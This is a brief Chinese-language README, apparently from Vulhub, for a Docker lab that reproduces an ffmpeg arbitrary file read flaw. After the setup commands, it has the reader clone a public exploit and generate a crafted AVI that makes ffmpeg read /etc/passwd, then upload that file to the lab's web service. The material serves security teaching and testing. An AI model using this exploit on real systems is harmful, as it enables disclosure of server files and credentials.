ffmpeg 任意文件讀取漏洞環境
Path ffmpeg/phdays
參考資料:
http://bobao.360.cn/learning/detail/4032.html
https://hackerone.com/reports/242831
https://github.com/neex/ffmpeg-avi-m3u-xbin
環境搭建
編譯及啟動環境
docker-compose build
docker-compose up -d
環境啟動后監聽8080端口,訪問http://your-ip:8080/即可查看。
漏洞利用
漏洞原理不再贅述,直接下載exp,并生成payload:
# 下載exp
git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
cd ffmpeg-avi-m3u-xbin
# 生成payload
./gen_xbin_avi.py file:///etc/passwd exp.avi
生成exp.avi,在http://your-ip:8080/上傳。后端將會將你上傳的視頻用ffmpeg轉碼后顯示,轉碼時因為ffmpeg的任意文件讀取漏洞,可將文件信息讀取到視頻中:

你也可以執行docker-compose exec web bash進入本環境內部,測試ffmpeg。
Vulhub 文檔
推薦文章: